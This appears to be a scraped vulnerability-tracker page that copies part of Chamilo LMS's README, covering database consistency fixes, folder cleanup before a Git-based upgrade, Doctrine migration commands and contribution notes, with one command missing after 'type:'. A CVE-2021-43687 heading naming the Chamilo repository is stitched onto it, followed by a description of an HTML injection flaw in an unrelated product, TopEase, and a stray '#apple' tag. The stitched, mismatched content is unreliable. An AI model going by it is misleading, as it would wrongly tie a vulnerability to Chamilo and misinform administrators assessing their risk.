If you have previously updated database rows manually, you might face issue with FOREIGN KEYS during the upgrade process. Please make sure your database is consistent before upgrading. This usually means making sure that you have to delete rows from tables referring to rows which have been deleted from the user or access\_url tables. Typically:

    DELETE FROM access\_url\_rel\_course WHERE access\_url\_id NOT IN (SELECT id FROM access\_url);

**Upgrading from non-Git Chamilo 1.10**

In the _very unlikely_ case of upgrading a "normal" Chamilo 1.10 installation (done with the downloadable zip package) to a Git-based installation, make sure you delete the contents of a few folders first. These folders are re-generated later by the `composer update` command. This is likely to increase the downtime of your Chamilo portal of a few additional minutes (plan for 10 minutes on a reasonnable internet connection).

    rm composer.lock
    rm -rf web/*
    rm -rf vendor/*
    

**For developers and testers only**

This section is for developers only (or for people who have a good reason to use a development version of Chamilo), in the sense that other people will not need to update their Chamilo portal as described here.

**Updating code**

To update your code with the latest developments in the 1.11.x branch, go to your Chamilo folder and type:

If you have made customizations to your code before the update, you will have two options:

*   abandon your changes (use "git stash" to do that)
*   commit your changes locally and merge (use "git commit" and then "git pull")

You are supposed to have a reasonable understanding of Git in order to use Chamilo as a developer, so if you feel lost, please check the Git manual first: http://git-scm.com/documentation

**Updating your database from new code**

Since the 2015-05-27, Chamilo offers the possibility to make partial database upgrades through Doctrine migrations.

To update your database to the latest version, go to your Chamilo root folder and type

    php bin/doctrine.php migrations:migrate --configuration=app/config/migrations.yml
    

If you want to proceed with a single migration "step" (the steps reside in src/Chamilo/CoreBundle/Migrations/Schema/V110/), then check the datetime of the version and type the following (assuming you want to execute Version20150527120703)

    php bin/doctrine.php migrations:execute 20150527120703 --up --configuration=app/config/migrations.yml
    

You can also print the differences between your database and what it should be by issuing the following command from the Chamilo base folder:

    php bin/doctrine.php orm:schema-tool:update --dump-sql
    

**Contributing**

If you want to submit new features or patches to Chamilo, please follow the Github contribution guide https://guides.github.com/activities/contributing-to-open-source/ and our CONTRIBUTING.md file. In short, we ask you to send us Pull Requests based on a branch that you create with this purpose into your repository forked from the original Chamilo repository.

**Documentation**

For more information on Chamilo, visit https://1.11.chamilo.org/documentation/index.html

CVE-2021-43687: GitHub - chamilo/chamilo-lms at v1.11.14

Insufficient Input Validation in Web Applications operating on Business-DNA Solutions GmbH’s TopEase® Platform Version <= 7.1.27 allows an authenticated remote attacker with Object Modification privileges to insert arbitrary HTML without code execution.

Tag

#apple